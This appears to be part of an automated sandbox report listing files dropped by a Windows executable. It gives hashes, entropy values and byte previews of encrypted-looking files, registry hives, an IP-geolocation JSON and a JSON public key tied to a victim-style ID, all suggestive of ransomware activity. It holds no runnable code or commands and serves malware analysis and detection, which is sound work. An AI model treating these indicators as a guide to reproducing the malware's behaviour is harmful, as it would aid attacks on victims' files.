              SSDEEP:24576:FLSxZ8/aVnFNVQ2I8wHXJH9KPauPgnr/GTvYImqrYEz7xiFmi6AA:UC/SnFNV+FH9KyuPMr/oeqrYEz7xiE
              MD5:06B7E15C281A31A1C942EE76A001D8F0
              SHA1:E7E56175A8DF508AAE7AF79E729C78B5E8988359
              SHA-256:6CACAC2D289FAE36B500B5F1AFEA077D81B0EA6278326B470BD88358D6F6163A
              SHA-512:314937BD8C384F423C1012E2FC1E016A6833452D48DE70482D3F0E4E50BEE790D587B8B9FAAD1CA95E47E24B662FEC0FDE39171DF4217ECACA16C6522739C980
              Malicious:false
              Preview:CMMM ,........./.\xE..f...c....e.b..Yqr?Ytp........B.5.<1..W&.........=.....V.aG..%;A......E.a../...Oc............M.m`.o......Ao.k.Mrk...m.<O..H.K07...8...@W..N0...1....).5.*..__..a...}f=O....U.B....h.Z..../:g."...aa..v(.(.c....~v..D...~`..I...'o...e?.g}3.O.4...a..e.`o.Z.........L..v...H."{k^...:Y2.*h....9K!.....3Y.\{'...v.......#!Ju.[.....".....LZb,..;..Y..W4l..4"....wR.=.4....p.m.#.@G.... _....Wo..6.X....3ni...0V.\.*....F7...6....C.....8...j.B..<.%&.im6..&..}..Xo.x.*!=Ek....7a@.9.W...G...........s.2.h.EF.?.....*$G..|.....~..},.V../....6i.X[..Y.c..z..0...|.i........mr.\.....D7J...`M.0{).oxl.*.~.=ci.)..!;.o..!.i...P...".Vn.........)*..pC........G..?...[rI...+....y...{.\*.#A..Ey.......b+.....3MR _..g.V..b.P}.."d...........N4....).."t..[.{.g....?..I\..`.y...Z@pq1f.B..c)h.\.i'.3m.(_...u.).g.Xm..W.W..A.VbX.s.w..J,.+W~-H.s....D....8!.Jp*&G:&..b,..r..}H...nU........l....wJWx8.;|........".....bJd.^v.Fu....6....g.>{....$ .5.K....Y$b.1*..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.269026508053897
              Encrypted:false
              SSDEEP:6:0V8kkRfFCHi812i1pUhNYZh/6oo9ke+IQDgLGQ7eioJRo7dU33ukIcii96Z:FIiy2i1pPZpMGFk7go+ukIcii9a
              MD5:E776C7D0419903379A84D3AE6D8DCFDF
              SHA1:94054D7F3DBA450786AB96CC4165D2E7BED0617D
              SHA-256:1E9CBE9D7F23A2F7A6C6F1B4FB1A36EFCCB998596F375AE83702726E31D275C9
              SHA-512:C6AEC1E0B02CBEA5B7F098936F67F16A67D64ABDFFF79F9C3F9674AC96398787D2D0504E643BF666BA88B01EA5C74043E0C71C395FD74C701468B2BA87149564
              Malicious:false
              Preview:CMMM T.).8.z....z.w.....~&].....*...[.U.F.i.z.^f...e:{c............1...O.?..#ss.......]^...Zc....^KJz..r4........D.dw.?v....Q.w......9q..S..Z.2.yH5..9.=.w3.sF...w.y..i.w.tm.8".....6...z...\LQw.....#......k<-..p..s........5s.(...X........q.......QbC.{.c....X....I%..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.344318738339881
              Encrypted:false
              SSDEEP:6:8uoDqNAeRIkhsPYq2RD/4esG9nfwtGLDfxUTZhaFeRQvAH+fDFwC3ukIcii96Z:8uomN9pGV9onfwwOtItvpDFwqukIciik
              MD5:85D7AAEC9CDB6350957BE869E886B12F
              SHA1:8CC75A5D5AF369A58335458884B8F2DB99AE9FD5
              SHA-256:1C8D81A735F2B89393C7ABF1564AB1BC286D32EBDECCAF7F3B93629A52C86663
              SHA-512:6275A778BE24497B12E38C0424F9CB6D2BCB17D7D2D8F429586F9A1FBA6A441FDC00023C485A2FA7AE87AC107E21234C93AC04AB1AE2E6E7B7454A91985F0B19
              Malicious:false
              Preview:CMMM ..g...W.....tP4C.)h.H...E..H-(...._i]~_.^......DI.<.T.^.O.ao.......A%..Q......6bA..C[....m.....@}.A.F..T.,k.Ux.b...R.....g..^..z;.T1.\..<..K.?......5..((.{^}.1.....d..o)..?:..............4!...nE.a..W..'.R1@.%Pj.........c......r.9.$.W..h.+..&...I.a.K..]..Mtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.31775512100936
              Encrypted:false
              SSDEEP:6:/4qIKehD6HrWL1VvuxUrWt1+JJU86D0ZciLpYiRCI27CgLfEd33ukIcii96Z:/4/K+FJVJrWtMjD6D0ZnyikUGfEdnuk6
              MD5:2AC9CE99AFC7FC0074A5FD8E5B879C0E
              SHA1:159E91B7078A818E67BF30F917FF28A44391B1EA
              SHA-256:BA19D9CC1CA7F565E59867AC91CD226A73B6493EA4051C1AEB0B5996CAA35FEA
              SHA-512:1A4BA1857F890B801A49D5D1659E580CC65C425E9783348BAC41772C4E9FC6D6B931A9074AD23B36E9DF0AD5F105F0FEF5C2E783FCD53E69B2AA4259548E921E
              Malicious:false
              Preview:CMMM `bhy....?4"..t.7\.....1..@.C.S..u.U....J..N.~V.cj......7.6\....:}.%..u....j.#....5...qR.?*.v.-.BH..n..wG.U..-A......$.^..>.<.M...;..!.&`..E.4....:..'.....g.O!Ir.}....].!v7......H._..<...G[...D.cL......j*D......`.|!.KVT......a:|.A0...\.Yu.. (.Q.4@..(.Upem...V".|..V.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.32368515747979
              Encrypted:false
              SSDEEP:6:LfMwIWByTjzoUdnUoA357HDdWdOiJDPjO4dWakPP3ukIcii96Z:tByTj9dxANBWIiJDPjjsPukIcii9a
              MD5:6A3E183D6D959D8C3B6CF3D71C39926D
              SHA1:A65C0136D4E03B4A73D236C076B82AABC700D5F1
              SHA-256:D804E8F3CDCF0BFBE7BD5B6F5FF169E0B2FA55B6EEC6B2CAE61E3F217A3D30F1
              SHA-512:3A31CCE762E78CCDD6105DC70020D0A6F0FE16B3B23F079D0817FF1AE4971308EDD6F8E247C5F8FD9290526EC44942C6B24D1693B7D89C9046FE4232E219E705
              Malicious:false
              Preview:CMMM ..OS..a:..@]..i...U...d<..*...q.dO..Z....)...K..9...b.b_.o2.M....?.../._B..%..o6\.<....W....i.%6 .r.u.Uc...D...j....~z.H..g..V...O... .RU...}h?F..`.A.D7{t..+&yM.....ER.)...L....C.Z.....K<.|e..k.w6.~"..K.[.<..<5..D,S....^.O....\.]...R........P..?mp...X..|.W..9.b....4.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.346031526194873
              Encrypted:false
              SSDEEP:6:94RFLglpdVqoXyyXeGDhsOLcIv9zOE0e0riG7ZaIP3ukIcii96Z:ywH9/eGD75vEE1lSaIPukIcii9a
              MD5:9C4416CA5AA6E8C105B0799CC158657C
              SHA1:DCC21260AD254D4533E0EFD176C9A011E9C3CAF0
              SHA-256:540AFC4F93EA1B1FB6CA5F4D57A3263B984501378613C5A8614B49BB68BEAB1C
              SHA-512:4011EEFDF98ABD019441670F14F92C6707128D0292833AEA79BF5F74AA09163817B7A9E7CE7C7B8CD0AA33774D52C8A80EF3A71B0364F4D568134C8047BA27CC
              Malicious:false
              Preview:CMMM 6.mW.#.i.W.N..O.....Z8]...y....N5..|....d.Be...:..lG..X......+k......G.+ KN:;.Wma..z.b.?....,..QQsF......x%...,52.n./X'8.3x.Y.&..5..Y?...h..Y\...d....^y......[.....F......v........;..x.......Y.s.|.j*...y....o..........K..7.a......$....H.. X+1G.a..15...AD....,..8tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):411
              Entropy (8bit):4.6420780896559455
              Encrypted:false
              SSDEEP:12:Yd9wpHEx6useCtrESQVctrESQVzR4heQ3htrESQV/m0mQP2JSnVR:YdgHD+CtrRQVctrRQVzRZQ3htrRQV/m0
              MD5:EDCA7C5EAEC41C2D1880B6161721C8BE
              SHA1:9A650E1C3E6B7E8858A48D55F21C10C99EBE8AC8
              SHA-256:CADED2E85735BEB1518F1C907BB108B1DCD9C481DAD682B7E0A8E1009C541065
              SHA-512:2C39E15ADEAC90FB6D8F5F87B384F86A79E15F0582A4E8618C264FEE7223958E2F51AC5FA60001F95AE215351B677D91718E551DAB655B14F532556CC2D6AA7A
              Malicious:false
              Preview:{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","city":"New york city","city_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","latitude":"40.713192","longitude":"-74.006065"}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):560
              Entropy (8bit):5.995520112113063
              Encrypted:false
              SSDEEP:6:YGZPTaBZN7Qg8zhfzFY/fy6k/QenH+hQALwMJBJ0gZE7N7fV7hBzSfH6uF0ZIAxl:YGJ68hffYQ+C2weB2gWPzs6a2x+58d
              MD5:5B9C1A67229D601AE777836C962A6335
              SHA1:D0877A363CA9727966BB57C2F48D433EAD509405
              SHA-256:CF8877BDC45427B4650BF567A2338DF26F489B9A4D963793A60DFB921B3CE7F2
              SHA-512:5805A7D0DAF851FD9640C77763115D8E50F628BB5CB94DA326ADD489C6E97943CDDB5244B98FAD6B00D8C49CF7A8BE4614B5BBEC9BE6BF9D21B05370E5751C86
              Malicious:false
              Preview:{"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA9TLHfuwgL1EtGNw\/w5eV\\nWD5bVX7I4cOUSxyG7YpbAlG6kOpdBiNnZNaw3o0u7wTyOFhL1nuapc8slWn82lHn\\nbvxMZujUIAxujWHz2gUbptx3FLpNutAbyett\/0L6xzEMXFmg126vYM+\/vesY1SSB\\nPxEsNG5LmHT3grWBeYX\/gYouGbz8OoLTj2HYfU2dQ35Z0D6kICwFghIUDaiHlB+1\\nqQ5q\/FZdQlzkFIhimqtbS+HbzpJB4dnIF\/TD9iNmFWJwjyAjaJjfdV1npllllYLK\\n3lHt4qRVdUfJBn0puzHB218fzdgcivOuvxzrBR9zm8vj45HmdquPQv5T8abYGYIn\\nXwIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT"}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):64281
              Entropy (8bit):7.997203695537066
              Encrypted:true
              SSDEEP:768:OqrK3sV5XeIIEXNg9ny8b3/hZzo8lpXJna3Pmrf3MFQjKAM1r4aQ5FJ5c+TCdRMX:/K8Jg9yMPRBljKRr4J5C+kMjm9c
              MD5:803D95B376D8AE166CA5A21167091A31
              SHA1:F1F32C0152B1E839F97CC00460C097A0F3AD0500
              SHA-256:33D2DE0EEAF77CEA6737CD2DD490CD8B217B0E01709B1440267AEAC522B28664
              SHA-512:1D8DDF9EAB9559062517E8CFAEF93B288B513FF53CE0ED96F4C8B1993E2519E82E0947FB5939059F13C098FD5252AB2C550CB2A1B7530CFD29DF6CAA4BA5375D
              Malicious:true
              Preview:<?xml......>.........wZ.....HmE<m.Y..J.V..X.{.gM+^0u}..[...Gx......!.!z.Gz5.!o.Yx.....}..R....P....9sV....0...P.c4.H..3.1UAH}.......l..2b.....x..I.....q..`?..E.c..o.t.c,...I.,.g=.5H`..;.4HM..#6w.b7...4T..?....&.a.....V..n*Y..Y.r.vo..._...D.....?}..;..^g0MJ 1.C...C".o..ta\=.....Qz0.YB=}^....o........6<..........W..<........c.&..jQ7...$/B..+o..!...s.H!..g..\...Z.SS{rx.[..Z.1......R.I=&.e.7.%......x........-..3F.qs..3$........J....n..E.XS.....R..a.+..F....?........A...:..p....[..Bnm..J..U..t..&9....<.4...}.................".qY3..}..D..P..VA.......I..t...y.....wDe`.T..\B.p..D...a..V>b..:..j.`.B1.).i.r...A}..R....a.$....Ml.`.%R.;..=~.".qy]4p.WPdWZ.%Y)IA...}.M6.|c.7...>.....j.}u...`.{...FX...G.....F/>.0m.H&z......\.......e...S..$...3W{p....:hQ....oR`>...ts..N...^.p..J.1...+.....+....lc.z.6I3:...EU..)...M..Y....`.Y.b.%.....}..1.......;.....,..i.K....c...wH.|7..)..]S{)5t..ByD&.u........i.H,jRW...>..Px.1.....i@...O.q*=Pa........rY.O.#....p...1.)..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.9797885235544515
              Encrypted:false
              SSDEEP:192:gkoHLpt++rGN3xEgdrQZ7yfiQdploVfqu8Q8F/d:b0LxSxE+rMufiQdk9qu8Q+
              MD5:AE83A70930075658E805642B3CBF614D
              SHA1:1CD5D93097B980399D1C72250A1BAEC864D381F8
              SHA-256:C5F47E8E6EBD6CA14354076A18CE8C5980B53A0C71AC6B9DCCFA0170E9C8AAFB
              SHA-512:FB905413DCB0C8FB1598A83D14390418077F8197A041EBA50EDBF38BE9E5017BE66E885A3C0F842C3E62FD2B330BADE06FD985EF21F39775C4EE0D56B52CF603
              Malicious:false
              Preview:.p.|.A.L.m.K...K.AK%_.k.%.;..]..e..S..N....F.>...k..1....>Q..K.X.1."..H...........Vi.)....U...7.W.F...3d .[...V..g....u+y..y......v`.@.[....{.V.1....=.uyN....7..V......F.......X......T.*.].[..s. ......A..t..;Q...P.xz4M.._.I.G....65`..O........J.`j....W%..'..M..._..0...v.yr."T......ps..-.....<T.^...%s..f..q....Ry@.Y............rk.q(..H...AOCN/..(.~.!...a!...>}..&....&.!...K..E&...'?.2.6.Y......j.|.h...`..O...x.....}|...+.=%/|C.4.o..9*..T.x17..~.......DftA.....?Vd..V.-..&.oW@s..Fu..9^^Z..m>|b>HPB...Ea......y\..m!*r.g..m../^E|..c|...U.....&L..f.'6$E...d=...=..aj.z"...D.d...{[v.ir.F.29.y.0=..6.zl.@N.....H..z.3.K.ok..D.$.....s.+z..F.Q.K^G..t...U..!g.......,.<..._.~^|..Jr.q0....1M]6O.3..#.....6...K.].V..fm.=r..J..... A?....\....=.l.K.[......%....UT..\.......X!.xG.l..*!.......3)6=..Y...^.U.....1..r.N..i.E.........;w.bC...G....._..]..).AS.[j..^...l.zi..Ie.~....SF...w.b.5.!v0..\2.Y...'....PL.ca..-......>.X.`5D@.FP-..U..i.+..1............~)@.D_-.W
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):7.0140957244222095
              Encrypted:false
              SSDEEP:6144:JkBhjDQhq9l1FSTyQY5OPdaFRmwBJeQNy6tsM0P8ATX1BK8O2JzJ:KjDFqYAo2yy3
              MD5:408BCECBDD80D12B791F085E3DAA744C
              SHA1:090E8C5C52BC2E5488CDD10702F59531ED614B6B
              SHA-256:5CE2EAAFFE48D3CABEC56D7D874AD3B0524084C938D4286AFD13B1A50B52049C
              SHA-512:13432F763FA4499BB8B4507458653D9F1EE46387448481ADF2D90607DEE86A5B7E481E7BCE830C6143391ED4DDA73BE25B7446C566FCA9F2CC189143162EE888
              Malicious:false
              Preview:w.I`.|........N.O.O.......M....8...G...9..#:.r2...e.-.!.R.^..&.L.J.Xp...>..[...~"T...."!.F.....T|a..h....Y_8..G..m.{.^.A.H.uaf.C...Wh.'!.P..H....L1.OZ.f..6..._..Ma$.._*.V;......KY..d.f.NjEI.O7..MH.ps. .C....B..4DO4x$...i...V.+...n..K..^.yy.4..Y.k.P&TK...@.`.>iy,...t^..~...`.{.....IP.....KYB.)a2..N.....l.......2... ...(....hh....z..5..A..&.xJyI......V...rTV.H..r!4......d..y..H..`P...$...{.d..4-...iC..4..H....7..Mt'u.......+....!..(#.\.RFRO.3..uH.4R<.w^^S...U.K.^..F.......;.......KoQ../\.{0."..gC.;...*..f."....a...!.3......p..s.UF>..c.%.Z.e...v....Oc...b4A...C[.>.C.....73lK'.b....si..H...DW1..`....oG....P..[......p.......~..........7h...9......ey...;.*..rF...._.....j...,mA.C..1.......x..D..L*.]././.gs....p\._U.&|.f.....?g.PB.z'7..G...k....=......9..{.........:.A.4....P.g..|.....F.........d......:,..V.P.D.$..Zn.#N\.S+..~... .d..wpT..;....h..Wc.,.].x..{.....K.g...QK....O..0B...].0.x..d.R.<*.=...A...H.......f.>s...b../.v..-<.........L$..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):3.2081746516060665
              Encrypted:false
              SSDEEP:3072:S0jpP4DilR0JAROK/jRwlEmHRNlBrGiyNN1NTAHkK2aytrLp6Hv:wKmCX/jRwlEmHRNrPyxNXtXMv
              MD5:F3365232190D724BF98ACAA026A62A12
              SHA1:A487424D3F79E35F7D12708C511BAAE58466B3E3
              SHA-256:FCDE287CA8357C1D4F947728B8867C475B6EC263865FB238CB1C0918469A4826
              SHA-512:22DAC7035DDE67D01CFC3CF8018A100303BFE98D9F5219B1BBE5155A1D82421073516905BD2FE9D82B6206E9BE26F8720CB318254D7E3FD7F524A565E61EF7A9
              Malicious:false
              Preview:.....>$.,...w.A...;...t3|.o.9b@b.hQ.".W.[x[.....0-._v.R..q.S.#..l..2.\.w........&.,J..*.v.:3......V.....:U.n.........kRS...no...+......;..2......27v.....qb.4.|...D.6n.'....,....m....,......r.(9x.!.R...x..w.P......fk.2)]...f..2.$..tT._....`...]@....sG..s....w...42....)..D(%h.`...aq..Y$.0.....,..G>3.m.....im..M%.......K."'....`.'...=.I..9c...`..c...n.H....$\..(...p.]....yv.!..r...R.Co.f...}...a..f..Be....*..f.9.n.%......LF.D9... VA.{C.+.]....$F..:3A..3z.)'.../;M...g...'.l(~..(...K.Q....Z9...S.`.......B.W.o.[Rd..C........f.,t.j......2>.5s..%.GmG...........>......[.;..{..]t.$#q.;....3O3....<[@.-..>C[.n!KFE..*.r....E...H.....3.x...7.B..../e.V.F-.A.Q...K._...nE%pS....{....o.R\.(og.N.8.2......0KUa.qs..C...$Lh..C0.@G..W.r.o.G.dd..Q.$...b........Ri..z>&...&.z......ih.wp.n.....}....J......NEV...O..B....C.&... ce...].K..s."..&G..m.n.|...;WB.$V.........g.0.S......j..j....`.4J...gs..?.@V.Z.6=..H..Yh+d/f._I.........l..w.]KZZ..-H>O...9.z<..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):3.207994898153344
              Encrypted:false
              SSDEEP:3072:o6dNqxQXZpn4rGaohs/9hZQNiCHpi3XRQRyvb53VUhk0r:o6HqQD4L9h2JEXEyvb53VUVr
              MD5:BC1283FA687464CC0409090BBDC433E5
              SHA1:086ADFD29306950D63BF0F4C372A301893ADC01E
              SHA-256:D505820979CCA37FA663329C4F251BDABBE94167B39AF7787CAA7BA7DD7E2200
              SHA-512:DCD44368A7549E1BFDCE1F81424DB86A3B513BA51EAB0C78889A277D43470B3D3354AAF2AA0BA845560625041C9A75E0BA44F4FB434B6596C6E7F68D40F9E1C6
              Malicious:false
              Preview:.....d~....f...f7...........]...q.d.4..L.9.AFS..&...]..RV..O...!'[...V....65.w..w2..!.@..D.K%..|.... .L..l4?\.(..U..q.pB./..)].Z.5.._..#&.'kS..[N&].9.v[....$...+.....!:..?.Y..i$1..~K.t!Hp.9....c'..A.._.[..a........gZ7 ..SFN.T:'..kq.$..^.....6!.@......).......zk....M.`.'NW4/~8.o..~N....g..b..7.`......9f.~.............z...J..=..<..z...8Qh..xa....z.h..v.Q....H.hg..f<j.X.r.6.mh..".G..1.p...=.....<.j\.l..)3.h....ul.........a....&.....'....4R...t.eURI.W.#....3..8w..TD...'t6.r...q...._.Z.r..;..J..::..bP..2.j..iJ...s..<D......*<.m...r.K.2.M*.......C....+2.z?/.t...-..).0.WDF.0....g.x......\7U^..J."..[..r3..)...9%i...J.8.R&....g$..==..]../.U..9@........;[V..^NE...>....h.......i...W..R...#.z.....G..p...w..%.F...)umR(H..~)./..$.p...c|@.5....u..OR.<O.....7.D._...7...3%1q#r*.#.M........V.L.R{....L..{G.k...k...`QR.E....}=..).'....OD...5.....,..\...ak...H.k}....b|l..q..3w..?.gv+...O9dx.N...[.D....@.&"...6.(ciu...Y..%].,.O~\.......yy..@a....PCV.9n_.r
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):6.6637461095943475
              Encrypted:false
              SSDEEP:6144:dvcEC/f/7my6lFGZhTVSdYbbsK0eBQ6GuwlcTKcBwqGQguuleoxvTxcZxBvxdhvS:dkn/7my6l0hTVSdEglttEjxS
              MD5:EB15E0410E5C5EE141AE7EA1790B78A7
              SHA1:41FBCCBB8BDB91C433572EB3F797C512C532CCF7
              SHA-256:9BDD9FE2E8BB32E078F658A384C64E1CD8C0E1631836C61B0358A59228263242
              SHA-512:D8174E8FA3E4D59235FB41AD1E463A811EA66070C713096C7519DAB428F51ACB09C744C01946DE400F3C3DFDD67B1720478522B65EC253C887F81CFEF26275A1
              Malicious:false
              Preview:.....@d..mzl..q..O.)'L......s..qX\}...5v..PMw.%.....^..9R...Dv.....p:....w.R.;...9S'b....W...e..."...um..a..z..**t..|...VL..61..g.U?.9.U..?.<.A....q..4.p+y.?...#...r.,...?....-.x..%.<.,......p..f..9..i...g.7e.>....L..:j......m.a.A...a.}..J....Y*.O....T......"0."S&R......M;.7;C.. .S.1.SWx..q.R.<...T.8..2.k...c..aj<..A...|...`cu..uD..>.jb....%..B].U...c!..D.l:....k(.XI.>..3i...V....Hh(..........2].-k.J.wa.8?..f..|./M.@.EA6}t.k.l.4Q.m..r....'..E../B`r]x./.J.0H.n=Wd-C..^....5a$.W..P.:..g."~W9F......`..|.....o....d[.&..<...7.... /...t.M.&..s..9US.{.......F..A.4..X`...Y.yyw.E1.......r|6..=.hp.....1u..#tt.._...nf%0....#.....P..8L.....C].=..7......./X~.l.Z.:V.a.qq..e......`.3../......@......p.o..%g....(.._...y...O....".@.q. ..m.mTQ.ft`...W..M.....:..[...e.t..V..w..6Yh..H.......i..~.........f.?{+|..K-..Q.%..FWc]..7...`s?.pL..h..c[rD8.=...2.M...5F.........8k..o....z...p..)o..%.`.X..O../...%..F.%T.nX...Z('....k..\..HX.4..M/.z.r.gS..?...*k5[...z
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.976488243337732
              Encrypted:false
              SSDEEP:192:d40qL6mW+kZHSDneAMymjDj7TKfgGRBBRlGnjihkLZCeujXh8IMxeQrM6CD1/:d4PU+aHSzHWDTmzbne+uaXh8hFAvB
              MD5:6FF16E18BEBE7A6DAFA7C49AF977346D
              SHA1:5FEC910EC29712FB68E20A42EF196AD18420D51F
              SHA-256:36213B41B6B91B9A8027FCE1B34FB7A229F96DFA1AFEDE9E2B0023C1DA3CC255
              SHA-512:F99ED14CCC426D403067D009E97B2A218684C409F2961035B23D4E34291090F705F80F2D66DAE813CC273AA519AA1A6F40B90EA228C6CC21E1EEF82C1B12CF84
              Malicious:false
              Preview:regf.G...64T.m<.rO..&..............k..0B}V..,.`?6R. ..Z.^@.^4......r....S..I.M.1&...K.&..!..L.Z7..c..6.J...m..%W......DKK.{..~..ps'.qs.b....e|PP..&..`....mZ..a...q...t 4.".r....i..g:.I.K.S.#..uR^....#..<..D.J{..8.....|..8....S>:KB6.Pr....{...6Wi...3...\$..P..`.w...Gr$..0.'_.i..u.fep.L.4x....(.._s[.@..A...+.6......E..qz.}o.~...=Yo....t...J5..p`...1l...M...Kf3..lgo..`}.......=!.`.r.kL....I.T.!..|...lYz...hc..v.-.6......5..n...c..zK..Z....%..u4.R..X<.63..t..cp...a8..IMN.z..B.......YM..{/sy'..T........a......b.7[A..e..q....G....q...M..]d.d1.c.Hj4.....O).nP.D..\..{...........XZj......{.r[e7...>4lZL..g.q.G..W(..B.M.......J...^...........[....!....Z...0..P/2.]....I]h.Fd[...7xB.y.._O...?.T.+......}].D...W..jW.~.N3....YH.d./..T2..Y..(\..U..z.X.....2\.@?0..,?.j..Tm.L.........e..^....=y."h.L.2a&V6......n%...f....P/ ..M.vtyF..R7{......)o.aL.z....[WP.Nh_L>s....w_.M......f........2cXDY.2cq@.t..'...X..f...g.,.E......t.e.l(..z..\'.,...Gx.pM.....\...1L.&.@
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.9802088983284944
              Encrypted:false
              SSDEEP:192:QBanct7LAjq7O1cPMzyvGBo2BJoaoBX9BrtqLm94:u/7LAjP1cPeyvGBN3oaoBX3tQ
              MD5:78C238295AA17C6B77CEF1DE1FA37949
              SHA1:C1085355DB828E68A0DF6B369AB21B943545A6D5
              SHA-256:C691D5F9FAC4656B885ACE4B1EAF1A5A6C1A070E6BD608F322EEA0BD6B55918B
              SHA-512:46F294E4C9455A765589361E07DF85516225E166E880BCA8178AF61B3791AC755FA108F59EFD1F9340141BD0A9EE20F2F8655EED97692B1223F47DB8687FD366
              Malicious:false
              Preview:regf.}......7J..........8........."......+uR5jAV.........6......J.b+..."9.....",.#....t.;..&......x..q.3...c.F.B(.@Ff.d..l.]b..:...oc.h.`..y.7.m..v.i.H^...,...v/ jB....3..1.Y..B....yn..E...N...p.Jp.....6B.c/.....r.....g.F/...|eu@J...] .Q....A.$..Fn1....b..u.-...s./.m...Z..2Ws769d...2U.M.X$....%3.`..Dr.)e..n6.'.dm....[..1...Ig....[....Y...J.4..h.osi.Q....U@... J.[~).o..l06. .W2.m.|.k......Wx9x.....Dx;M>.;.`#)9..c.{#1/.y.\<.t...0.XS.bdB....[6..5..$.........+.Dx.....Q.D.]F..A#.....(N..s.3.9#,{...)...Q.p....Q.so.p......u......(...V7}.tR.I.r.R.&n%.....L.m...(.}....7J..r]T.q.v..*o.qXG..$<C...:.4.K.....\.............H4I!...-..@2\...E_Ga.@.w.....$Bs)..|c.$..m....o.......!=..2e.q.?..+.-..CG.....*.|.B..^v..=8."..........).YPf.. 6.......47{..2...sJ.n.(r...rV. eN)J.E....:o.wW.-c...Q...`'G.....'}..."W.r.&...M.Z...jx..}.>.).. ..I.?....k..0....._(...._W.....5k..[....*.I.?.cV.x.Q..u..S69xQ...L..7g9i6}..u..*.!.].e`w|.X%.i.R.,..y..F.p9.k.6a]VB.].....
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979470355278914
              Encrypted:false
              SSDEEP:192:BU0VrARXfOFeCDrdnhx1nTBuXObYWkKuYKH8:BHrAVOFhbXBrkKuYv
              MD5:B81FE1B2CD367F62C9CD54BE91FCE5B8
              SHA1:EC97751BF47AB45E35D8416C51300821E764E252
              SHA-256:9A804FFC92E56A0D69B6E17FC95FDBDC4246FE95C7779EB98D98B1A037D7F85A
              SHA-512:4F82DDFEDEEFEEE2098C20DE1C8B417B012BC4A1AFD842EEE792375BA90B126A88E2635DB5A669B25957914D10ED4E40C996DC2F1390A0A35FE4B546E12E4EAE
              Malicious:false
              Preview:regf..t.)u.*...y..p`q.<.S\...>#.Fq.Z.?8\.3.v..m.K&Tc.jo.....a...b'^.E....c...0....73.M f..../....../.'p.Y..t.........d.-z..b60s....-,.....]..lAb.....K|o.|I.W...#..=.R.<.j.^..Y5..O..#.8{v.r.cU..#.^.p.4%T..*...O;.2>FT..[..#.7.j..<.[.?U... A..]Yd..a*..]..g.\C}...75h........V..\37._......c..7.....OI.u3b._.....xr..\...|.k!.BM.r....(H..)<r;..K6r..dDG.ZE...%H.f:6'.HI...cC...........G5..#.a.......Y..].R"..d.'..).w.v.......P>.8../..OP.@<.sf......k.Dq3.'.(..0...5...!.F...vat..ZhTiO3.~.X..u..A..j.Pv..t.\...r;..D=.RA6......U..B<....T..<4/...|......w/.U...]".7W.bm.....=.f.0..2+.\.:z.a...P.?.......h...-.e.ST....0...>.X...xZF..g..I.o...Em.W.?w....m.....r....SNo...ESd..<X...m..i......&C.kH1.m.g{D>..Z.Y~Eb..Q..w..}...N1|.1h#...j.2....I...n.QmS....T.pE..=WF...].p]._}...G.. .._...8.0...A!...`.....o...#...z.'...K{..t{=.....@.0.G%...pnN...p..a.....{bv..s........J..5"......+.A;/...2...A........&..$...)..>HS&...HG...8.-a......u......P$..\..dl.93..k.Mk....O.qG.`....>?Y..0v.B
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.97470424799644
